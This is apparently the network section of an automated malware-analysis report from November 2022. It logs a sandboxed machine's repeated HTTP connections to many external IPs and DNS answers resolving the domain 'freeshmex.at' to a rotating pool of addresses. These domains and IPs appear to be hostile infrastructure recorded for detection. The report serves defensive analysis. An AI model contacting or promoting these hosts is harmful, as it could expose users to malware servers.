                                                        Nov 20, 2022 23:29:23.233603001 CET4971780192.168.2.441.41.255.235
                                                        Nov 20, 2022 23:29:23.322693110 CET804971741.41.255.235192.168.2.4
                                                        Nov 20, 2022 23:29:23.322808027 CET4971780192.168.2.441.41.255.235
                                                        Nov 20, 2022 23:29:23.322921991 CET4971780192.168.2.441.41.255.235
                                                        Nov 20, 2022 23:29:23.322964907 CET4971780192.168.2.441.41.255.235
                                                        Nov 20, 2022 23:29:23.411640882 CET804971741.41.255.235192.168.2.4
                                                        Nov 20, 2022 23:29:23.797904015 CET804971741.41.255.235192.168.2.4
                                                        Nov 20, 2022 23:29:23.798330069 CET4971780192.168.2.441.41.255.235
                                                        Nov 20, 2022 23:29:23.800646067 CET804971741.41.255.235192.168.2.4
                                                        Nov 20, 2022 23:29:23.800730944 CET4971780192.168.2.441.41.255.235
                                                        Nov 20, 2022 23:29:23.847181082 CET4971880192.168.2.4222.236.49.123
                                                        Nov 20, 2022 23:29:23.885709047 CET804971741.41.255.235192.168.2.4
                                                        Nov 20, 2022 23:29:24.138269901 CET8049718222.236.49.123192.168.2.4
                                                        Nov 20, 2022 23:29:24.138458967 CET4971880192.168.2.4222.236.49.123
                                                        Nov 20, 2022 23:29:24.144349098 CET4971880192.168.2.4222.236.49.123
                                                        Nov 20, 2022 23:29:24.144644976 CET4971880192.168.2.4222.236.49.123
                                                        Nov 20, 2022 23:29:24.435672045 CET8049718222.236.49.123192.168.2.4
                                                        Nov 20, 2022 23:29:25.349183083 CET8049718222.236.49.123192.168.2.4
                                                        Nov 20, 2022 23:29:25.349242926 CET8049718222.236.49.123192.168.2.4
                                                        Nov 20, 2022 23:29:25.349328041 CET4971880192.168.2.4222.236.49.123
                                                        Nov 20, 2022 23:29:25.349395990 CET4971880192.168.2.4222.236.49.123
                                                        Nov 20, 2022 23:29:25.381669044 CET4971980192.168.2.4138.36.3.134
                                                        Nov 20, 2022 23:29:25.590801001 CET8049719138.36.3.134192.168.2.4
                                                        Nov 20, 2022 23:29:25.591074944 CET4971980192.168.2.4138.36.3.134
                                                        Nov 20, 2022 23:29:25.591074944 CET4971980192.168.2.4138.36.3.134
                                                        Nov 20, 2022 23:29:25.591377974 CET4971980192.168.2.4138.36.3.134
                                                        Nov 20, 2022 23:29:25.640258074 CET8049718222.236.49.123192.168.2.4
                                                        Nov 20, 2022 23:29:25.801178932 CET8049719138.36.3.134192.168.2.4
                                                        Nov 20, 2022 23:29:26.479214907 CET8049719138.36.3.134192.168.2.4
                                                        Nov 20, 2022 23:29:26.479243040 CET8049719138.36.3.134192.168.2.4
                                                        Nov 20, 2022 23:29:26.479348898 CET4971980192.168.2.4138.36.3.134
                                                        Nov 20, 2022 23:29:26.479425907 CET4971980192.168.2.4138.36.3.134
                                                        Nov 20, 2022 23:29:26.504734039 CET4972080192.168.2.441.41.255.235
                                                        Nov 20, 2022 23:29:26.583976984 CET804972041.41.255.235192.168.2.4
                                                        Nov 20, 2022 23:29:26.584177017 CET4972080192.168.2.441.41.255.235
                                                        Nov 20, 2022 23:29:26.584254980 CET4972080192.168.2.441.41.255.235
                                                        Nov 20, 2022 23:29:26.584254980 CET4972080192.168.2.441.41.255.235
                                                        Nov 20, 2022 23:29:26.662966013 CET804972041.41.255.235192.168.2.4
                                                        Nov 20, 2022 23:29:26.686750889 CET8049719138.36.3.134192.168.2.4
                                                        Nov 20, 2022 23:29:27.059041023 CET804972041.41.255.235192.168.2.4
                                                        Nov 20, 2022 23:29:27.059437990 CET4972080192.168.2.441.41.255.235
                                                        Nov 20, 2022 23:29:27.061732054 CET804972041.41.255.235192.168.2.4
                                                        Nov 20, 2022 23:29:27.061903000 CET4972080192.168.2.441.41.255.235
                                                        Nov 20, 2022 23:29:27.089216948 CET4972180192.168.2.4222.236.49.123
                                                        Nov 20, 2022 23:29:27.137278080 CET804972041.41.255.235192.168.2.4
                                                        Nov 20, 2022 23:29:27.376523972 CET8049721222.236.49.123192.168.2.4
                                                        Nov 20, 2022 23:29:27.376784086 CET4972180192.168.2.4222.236.49.123
                                                        Nov 20, 2022 23:29:27.376996040 CET4972180192.168.2.4222.236.49.123
                                                        Nov 20, 2022 23:29:27.377290010 CET4972180192.168.2.4222.236.49.123
                                                        Nov 20, 2022 23:29:27.664623022 CET8049721222.236.49.123192.168.2.4
                                                        Nov 20, 2022 23:29:28.573755026 CET8049721222.236.49.123192.168.2.4
                                                        Nov 20, 2022 23:29:28.573823929 CET8049721222.236.49.123192.168.2.4
                                                        Nov 20, 2022 23:29:28.573889971 CET4972180192.168.2.4222.236.49.123
                                                        Nov 20, 2022 23:29:28.573934078 CET4972180192.168.2.4222.236.49.123
                                                        Nov 20, 2022 23:29:28.600718021 CET4972280192.168.2.441.41.255.235
                                                        Nov 20, 2022 23:29:28.677823067 CET804972241.41.255.235192.168.2.4
                                                        Nov 20, 2022 23:29:28.677927017 CET4972280192.168.2.441.41.255.235
                                                        Nov 20, 2022 23:29:28.678064108 CET4972280192.168.2.441.41.255.235
                                                        Nov 20, 2022 23:29:28.678082943 CET4972280192.168.2.441.41.255.235
                                                        Nov 20, 2022 23:29:28.754218102 CET804972241.41.255.235192.168.2.4
                                                        Nov 20, 2022 23:29:29.086935043 CET804972241.41.255.235192.168.2.4
                                                        Nov 20, 2022 23:29:29.087414026 CET4972280192.168.2.441.41.255.235
                                                        Nov 20, 2022 23:29:29.087665081 CET804972241.41.255.235192.168.2.4
                                                        Nov 20, 2022 23:29:29.087737083 CET4972280192.168.2.441.41.255.235
                                                        Nov 20, 2022 23:29:29.126473904 CET4972380192.168.2.4175.119.10.231
                                                        Nov 20, 2022 23:29:29.324719906 CET4972180192.168.2.4222.236.49.123
                                                        Nov 20, 2022 23:29:29.402053118 CET8049723175.119.10.231192.168.2.4
                                                        Nov 20, 2022 23:29:29.402373075 CET4972380192.168.2.4175.119.10.231
                                                        Nov 20, 2022 23:29:29.402513027 CET4972380192.168.2.4175.119.10.231
                                                        Nov 20, 2022 23:29:29.402838945 CET4972380192.168.2.4175.119.10.231
                                                        Nov 20, 2022 23:29:29.402846098 CET4972280192.168.2.441.41.255.235
                                                        Nov 20, 2022 23:29:29.478913069 CET804972241.41.255.235192.168.2.4
                                                        Nov 20, 2022 23:29:29.612423897 CET8049721222.236.49.123192.168.2.4
                                                        Nov 20, 2022 23:29:29.678147078 CET8049723175.119.10.231192.168.2.4
                                                        Nov 20, 2022 23:29:30.610542059 CET8049723175.119.10.231192.168.2.4
                                                        Nov 20, 2022 23:29:30.610598087 CET8049723175.119.10.231192.168.2.4
                                                        Nov 20, 2022 23:29:30.610690117 CET4972380192.168.2.4175.119.10.231
                                                        Nov 20, 2022 23:29:30.618088961 CET4972380192.168.2.4175.119.10.231
                                                        Nov 20, 2022 23:29:30.893506050 CET8049723175.119.10.231192.168.2.4
                                                        Nov 20, 2022 23:29:30.932749987 CET4972480192.168.2.4210.182.29.70
                                                        Nov 20, 2022 23:29:31.192688942 CET8049724210.182.29.70192.168.2.4
                                                        Nov 20, 2022 23:29:31.192852020 CET4972480192.168.2.4210.182.29.70
                                                        Nov 20, 2022 23:29:31.517656088 CET4972480192.168.2.4210.182.29.70
                                                        Nov 20, 2022 23:29:31.517844915 CET4972480192.168.2.4210.182.29.70
                                                        Nov 20, 2022 23:29:31.777708054 CET8049724210.182.29.70192.168.2.4
                                                        Nov 20, 2022 23:29:32.595757008 CET8049724210.182.29.70192.168.2.4
                                                        Nov 20, 2022 23:29:32.595835924 CET8049724210.182.29.70192.168.2.4
                                                        Nov 20, 2022 23:29:32.595905066 CET4972480192.168.2.4210.182.29.70
                                                        Nov 20, 2022 23:29:32.601103067 CET4972480192.168.2.4210.182.29.70
                                                        Nov 20, 2022 23:29:32.860780954 CET8049724210.182.29.70192.168.2.4
                                                        Nov 20, 2022 23:29:33.064251900 CET4972580192.168.2.4222.236.49.123
                                                        Nov 20, 2022 23:29:33.363080978 CET8049725222.236.49.123192.168.2.4
                                                        Nov 20, 2022 23:29:33.363246918 CET4972580192.168.2.4222.236.49.123
                                                        Nov 20, 2022 23:29:33.363390923 CET4972580192.168.2.4222.236.49.123
                                                        Nov 20, 2022 23:29:33.363420010 CET4972580192.168.2.4222.236.49.123
                                                        Nov 20, 2022 23:29:33.662056923 CET8049725222.236.49.123192.168.2.4
                                                        Nov 20, 2022 23:29:34.293982029 CET8049725222.236.49.123192.168.2.4
                                                        Nov 20, 2022 23:29:34.294049978 CET8049725222.236.49.123192.168.2.4
                                                        Nov 20, 2022 23:29:34.294183969 CET4972580192.168.2.4222.236.49.123
                                                        Nov 20, 2022 23:29:34.300976038 CET4972580192.168.2.4222.236.49.123
                                                        Nov 20, 2022 23:29:34.329443932 CET4972680192.168.2.4175.119.10.231
                                                        Nov 20, 2022 23:29:34.600096941 CET8049725222.236.49.123192.168.2.4
                                                        Nov 20, 2022 23:29:34.630419016 CET8049726175.119.10.231192.168.2.4
                                                        Nov 20, 2022 23:29:34.630572081 CET4972680192.168.2.4175.119.10.231
                                                        Nov 20, 2022 23:29:34.630713940 CET4972680192.168.2.4175.119.10.231
                                                        Nov 20, 2022 23:29:34.630990982 CET4972680192.168.2.4175.119.10.231
                                                        Nov 20, 2022 23:29:34.932027102 CET8049726175.119.10.231192.168.2.4
                                                        Nov 20, 2022 23:29:35.824575901 CET8049726175.119.10.231192.168.2.4
                                                        Nov 20, 2022 23:29:35.824639082 CET8049726175.119.10.231192.168.2.4
                                                        Nov 20, 2022 23:29:35.824888945 CET4972680192.168.2.4175.119.10.231
                                                        Nov 20, 2022 23:29:35.824888945 CET4972680192.168.2.4175.119.10.231
                                                        Nov 20, 2022 23:29:35.876899004 CET4972780192.168.2.4210.182.29.70
                                                        Nov 20, 2022 23:29:36.125711918 CET8049726175.119.10.231192.168.2.4
                                                        Nov 20, 2022 23:29:36.126600027 CET8049727210.182.29.70192.168.2.4
                                                        Nov 20, 2022 23:29:36.126765013 CET4972780192.168.2.4210.182.29.70
                                                        Nov 20, 2022 23:29:36.126864910 CET4972780192.168.2.4210.182.29.70
                                                        Nov 20, 2022 23:29:36.130844116 CET4972780192.168.2.4210.182.29.70
                                                        Nov 20, 2022 23:29:36.380748034 CET8049727210.182.29.70192.168.2.4
                                                        Nov 20, 2022 23:29:37.219599962 CET8049727210.182.29.70192.168.2.4
                                                        Nov 20, 2022 23:29:37.219758987 CET4972780192.168.2.4210.182.29.70
                                                        Nov 20, 2022 23:29:37.219851017 CET8049727210.182.29.70192.168.2.4
                                                        Nov 20, 2022 23:29:37.219913960 CET4972780192.168.2.4210.182.29.70
                                                        Nov 20, 2022 23:29:37.279455900 CET4972880192.168.2.4222.236.49.123
                                                        Nov 20, 2022 23:29:37.555418968 CET8049728222.236.49.123192.168.2.4
                                                        Nov 20, 2022 23:29:37.555584908 CET4972880192.168.2.4222.236.49.123
                                                        Nov 20, 2022 23:29:37.555684090 CET4972880192.168.2.4222.236.49.123
                                                        Nov 20, 2022 23:29:37.555684090 CET4972880192.168.2.4222.236.49.123
                                                        Nov 20, 2022 23:29:37.831864119 CET8049728222.236.49.123192.168.2.4
                                                        Nov 20, 2022 23:29:37.966115952 CET4972780192.168.2.4210.182.29.70
                                                        Nov 20, 2022 23:29:38.215517044 CET8049727210.182.29.70192.168.2.4
                                                        Nov 20, 2022 23:29:38.738382101 CET8049728222.236.49.123192.168.2.4
                                                        Nov 20, 2022 23:29:38.738410950 CET8049728222.236.49.123192.168.2.4
                                                        Nov 20, 2022 23:29:38.738579035 CET4972880192.168.2.4222.236.49.123
                                                        Nov 20, 2022 23:29:38.738579035 CET4972880192.168.2.4222.236.49.123
                                                        Nov 20, 2022 23:29:38.768434048 CET4972980192.168.2.4190.147.188.50
                                                        Nov 20, 2022 23:29:38.938813925 CET8049729190.147.188.50192.168.2.4
                                                        Nov 20, 2022 23:29:38.939096928 CET4972980192.168.2.4190.147.188.50
                                                        Nov 20, 2022 23:29:38.939202070 CET4972980192.168.2.4190.147.188.50
                                                        Nov 20, 2022 23:29:38.939950943 CET4972980192.168.2.4190.147.188.50
                                                        Nov 20, 2022 23:29:39.014533043 CET8049728222.236.49.123192.168.2.4
                                                        Nov 20, 2022 23:29:39.113909006 CET8049729190.147.188.50192.168.2.4
                                                        Nov 20, 2022 23:29:39.731589079 CET8049729190.147.188.50192.168.2.4
                                                        Nov 20, 2022 23:29:39.731615067 CET8049729190.147.188.50192.168.2.4
                                                        Nov 20, 2022 23:29:39.731750011 CET4972980192.168.2.4190.147.188.50
                                                        Nov 20, 2022 23:29:39.731797934 CET4972980192.168.2.4190.147.188.50
                                                        Nov 20, 2022 23:29:39.759722948 CET4973080192.168.2.4210.182.29.70
                                                        Nov 20, 2022 23:29:39.906188965 CET8049729190.147.188.50192.168.2.4
                                                        Nov 20, 2022 23:29:40.007188082 CET8049730210.182.29.70192.168.2.4
                                                        Nov 20, 2022 23:29:40.007893085 CET4973080192.168.2.4210.182.29.70
                                                        Nov 20, 2022 23:29:40.008032084 CET4973080192.168.2.4210.182.29.70
                                                        Nov 20, 2022 23:29:40.008094072 CET4973080192.168.2.4210.182.29.70
                                                        Nov 20, 2022 23:29:40.255486012 CET8049730210.182.29.70192.168.2.4
                                                        Nov 20, 2022 23:29:40.836579084 CET8049730210.182.29.70192.168.2.4
                                                        Nov 20, 2022 23:29:40.836635113 CET8049730210.182.29.70192.168.2.4
                                                        Nov 20, 2022 23:29:40.836711884 CET4973080192.168.2.4210.182.29.70
                                                        Nov 20, 2022 23:29:40.836857080 CET4973080192.168.2.4210.182.29.70
                                                        Nov 20, 2022 23:29:41.085927963 CET8049730210.182.29.70192.168.2.4
                                                        Nov 20, 2022 23:29:41.327713013 CET4973180192.168.2.4210.182.29.70
                                                        Nov 20, 2022 23:29:41.584096909 CET8049731210.182.29.70192.168.2.4
                                                        Nov 20, 2022 23:29:41.585067987 CET4973180192.168.2.4210.182.29.70
                                                        Nov 20, 2022 23:29:41.585199118 CET4973180192.168.2.4210.182.29.70
                                                        Nov 20, 2022 23:29:41.585227013 CET4973180192.168.2.4210.182.29.70
                                                        Nov 20, 2022 23:29:41.841474056 CET8049731210.182.29.70192.168.2.4
                                                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                        Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                        Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                        Nov 20, 2022 23:29:13.462070942 CET8.8.8.8192.168.2.40xdd43No error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:13.462070942 CET8.8.8.8192.168.2.40xdd43No error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:13.462070942 CET8.8.8.8192.168.2.40xdd43No error (0)freeshmex.at123.140.161.243A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:13.462070942 CET8.8.8.8192.168.2.40xdd43No error (0)freeshmex.at175.126.109.15A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:13.462070942 CET8.8.8.8192.168.2.40xdd43No error (0)freeshmex.at41.41.255.235A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:14.572680950 CET8.8.8.8192.168.2.40x316eNo error (0)freeshmex.at41.41.255.235A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:14.572680950 CET8.8.8.8192.168.2.40x316eNo error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:14.572680950 CET8.8.8.8192.168.2.40x316eNo error (0)freeshmex.at138.36.3.134A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:14.572680950 CET8.8.8.8192.168.2.40x316eNo error (0)freeshmex.at190.117.75.91A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:14.572680950 CET8.8.8.8192.168.2.40x316eNo error (0)freeshmex.at200.46.66.71A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:14.572680950 CET8.8.8.8192.168.2.40x316eNo error (0)freeshmex.at222.236.49.123A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:14.572680950 CET8.8.8.8192.168.2.40x316eNo error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:14.572680950 CET8.8.8.8192.168.2.40x316eNo error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:14.572680950 CET8.8.8.8192.168.2.40x316eNo error (0)freeshmex.at123.140.161.243A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:14.572680950 CET8.8.8.8192.168.2.40x316eNo error (0)freeshmex.at175.126.109.15A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:15.216228962 CET8.8.8.8192.168.2.40xa0b7No error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:15.216228962 CET8.8.8.8192.168.2.40xa0b7No error (0)freeshmex.at138.36.3.134A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:15.216228962 CET8.8.8.8192.168.2.40xa0b7No error (0)freeshmex.at190.117.75.91A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:15.216228962 CET8.8.8.8192.168.2.40xa0b7No error (0)freeshmex.at200.46.66.71A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:15.216228962 CET8.8.8.8192.168.2.40xa0b7No error (0)freeshmex.at222.236.49.123A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:15.216228962 CET8.8.8.8192.168.2.40xa0b7No error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:15.216228962 CET8.8.8.8192.168.2.40xa0b7No error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:15.216228962 CET8.8.8.8192.168.2.40xa0b7No error (0)freeshmex.at123.140.161.243A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:15.216228962 CET8.8.8.8192.168.2.40xa0b7No error (0)freeshmex.at175.126.109.15A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:15.216228962 CET8.8.8.8192.168.2.40xa0b7No error (0)freeshmex.at41.41.255.235A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:16.590872049 CET8.8.8.8192.168.2.40x5769No error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:16.590872049 CET8.8.8.8192.168.2.40x5769No error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:16.590872049 CET8.8.8.8192.168.2.40x5769No error (0)freeshmex.at31.166.130.113A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:16.590872049 CET8.8.8.8192.168.2.40x5769No error (0)freeshmex.at175.119.10.231A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:16.590872049 CET8.8.8.8192.168.2.40x5769No error (0)freeshmex.at211.171.233.129A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:16.590872049 CET8.8.8.8192.168.2.40x5769No error (0)freeshmex.at138.36.3.134A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:16.590872049 CET8.8.8.8192.168.2.40x5769No error (0)freeshmex.at41.41.255.235A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:16.590872049 CET8.8.8.8192.168.2.40x5769No error (0)freeshmex.at109.102.255.230A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:16.590872049 CET8.8.8.8192.168.2.40x5769No error (0)freeshmex.at210.182.29.70A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:16.590872049 CET8.8.8.8192.168.2.40x5769No error (0)freeshmex.at189.143.170.105A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:17.619864941 CET8.8.8.8192.168.2.40x76a4No error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:17.619864941 CET8.8.8.8192.168.2.40x76a4No error (0)freeshmex.at31.166.130.113A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:17.619864941 CET8.8.8.8192.168.2.40x76a4No error (0)freeshmex.at175.119.10.231A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:17.619864941 CET8.8.8.8192.168.2.40x76a4No error (0)freeshmex.at211.171.233.129A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:17.619864941 CET8.8.8.8192.168.2.40x76a4No error (0)freeshmex.at138.36.3.134A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:17.619864941 CET8.8.8.8192.168.2.40x76a4No error (0)freeshmex.at41.41.255.235A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:17.619864941 CET8.8.8.8192.168.2.40x76a4No error (0)freeshmex.at109.102.255.230A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:17.619864941 CET8.8.8.8192.168.2.40x76a4No error (0)freeshmex.at210.182.29.70A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:17.619864941 CET8.8.8.8192.168.2.40x76a4No error (0)freeshmex.at189.143.170.105A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:17.619864941 CET8.8.8.8192.168.2.40x76a4No error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:18.759512901 CET8.8.8.8192.168.2.40xf865No error (0)freeshmex.at41.41.255.235A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:18.759512901 CET8.8.8.8192.168.2.40xf865No error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:18.759512901 CET8.8.8.8192.168.2.40xf865No error (0)freeshmex.at138.36.3.134A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:18.759512901 CET8.8.8.8192.168.2.40xf865No error (0)freeshmex.at190.117.75.91A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:18.759512901 CET8.8.8.8192.168.2.40xf865No error (0)freeshmex.at200.46.66.71A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:18.759512901 CET8.8.8.8192.168.2.40xf865No error (0)freeshmex.at222.236.49.123A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:18.759512901 CET8.8.8.8192.168.2.40xf865No error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:18.759512901 CET8.8.8.8192.168.2.40xf865No error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:18.759512901 CET8.8.8.8192.168.2.40xf865No error (0)freeshmex.at123.140.161.243A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:18.759512901 CET8.8.8.8192.168.2.40xf865No error (0)freeshmex.at175.126.109.15A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:19.315705061 CET8.8.8.8192.168.2.40xc04aNo error (0)freeshmex.at222.236.49.123A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:19.315705061 CET8.8.8.8192.168.2.40xc04aNo error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:19.315705061 CET8.8.8.8192.168.2.40xc04aNo error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:19.315705061 CET8.8.8.8192.168.2.40xc04aNo error (0)freeshmex.at123.140.161.243A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:19.315705061 CET8.8.8.8192.168.2.40xc04aNo error (0)freeshmex.at175.126.109.15A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:19.315705061 CET8.8.8.8192.168.2.40xc04aNo error (0)freeshmex.at41.41.255.235A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:19.315705061 CET8.8.8.8192.168.2.40xc04aNo error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:19.315705061 CET8.8.8.8192.168.2.40xc04aNo error (0)freeshmex.at138.36.3.134A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:19.315705061 CET8.8.8.8192.168.2.40xc04aNo error (0)freeshmex.at190.117.75.91A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:19.315705061 CET8.8.8.8192.168.2.40xc04aNo error (0)freeshmex.at200.46.66.71A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:20.788518906 CET8.8.8.8192.168.2.40xc176No error (0)freeshmex.at138.36.3.134A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:20.788518906 CET8.8.8.8192.168.2.40xc176No error (0)freeshmex.at190.117.75.91A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:20.788518906 CET8.8.8.8192.168.2.40xc176No error (0)freeshmex.at200.46.66.71A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:20.788518906 CET8.8.8.8192.168.2.40xc176No error (0)freeshmex.at222.236.49.123A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:20.788518906 CET8.8.8.8192.168.2.40xc176No error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:20.788518906 CET8.8.8.8192.168.2.40xc176No error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:20.788518906 CET8.8.8.8192.168.2.40xc176No error (0)freeshmex.at123.140.161.243A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:20.788518906 CET8.8.8.8192.168.2.40xc176No error (0)freeshmex.at175.126.109.15A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:20.788518906 CET8.8.8.8192.168.2.40xc176No error (0)freeshmex.at41.41.255.235A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:20.788518906 CET8.8.8.8192.168.2.40xc176No error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:21.983481884 CET8.8.8.8192.168.2.40xa74fNo error (0)thepokeway.nl5.135.247.111A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:23.232932091 CET8.8.8.8192.168.2.40xb74aNo error (0)freeshmex.at41.41.255.235A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:23.232932091 CET8.8.8.8192.168.2.40xb74aNo error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:23.232932091 CET8.8.8.8192.168.2.40xb74aNo error (0)freeshmex.at138.36.3.134A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:23.232932091 CET8.8.8.8192.168.2.40xb74aNo error (0)freeshmex.at190.117.75.91A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:23.232932091 CET8.8.8.8192.168.2.40xb74aNo error (0)freeshmex.at200.46.66.71A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:23.232932091 CET8.8.8.8192.168.2.40xb74aNo error (0)freeshmex.at222.236.49.123A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:23.232932091 CET8.8.8.8192.168.2.40xb74aNo error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:23.232932091 CET8.8.8.8192.168.2.40xb74aNo error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:23.232932091 CET8.8.8.8192.168.2.40xb74aNo error (0)freeshmex.at123.140.161.243A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:23.232932091 CET8.8.8.8192.168.2.40xb74aNo error (0)freeshmex.at175.126.109.15A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:23.846496105 CET8.8.8.8192.168.2.40x9c9aNo error (0)freeshmex.at222.236.49.123A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:23.846496105 CET8.8.8.8192.168.2.40x9c9aNo error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:23.846496105 CET8.8.8.8192.168.2.40x9c9aNo error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:23.846496105 CET8.8.8.8192.168.2.40x9c9aNo error (0)freeshmex.at123.140.161.243A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:23.846496105 CET8.8.8.8192.168.2.40x9c9aNo error (0)freeshmex.at175.126.109.15A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:23.846496105 CET8.8.8.8192.168.2.40x9c9aNo error (0)freeshmex.at41.41.255.235A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:23.846496105 CET8.8.8.8192.168.2.40x9c9aNo error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:23.846496105 CET8.8.8.8192.168.2.40x9c9aNo error (0)freeshmex.at138.36.3.134A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:23.846496105 CET8.8.8.8192.168.2.40x9c9aNo error (0)freeshmex.at190.117.75.91A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:23.846496105 CET8.8.8.8192.168.2.40x9c9aNo error (0)freeshmex.at200.46.66.71A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:25.381015062 CET8.8.8.8192.168.2.40x1b54No error (0)freeshmex.at138.36.3.134A (IP address)IN (0x0001)false
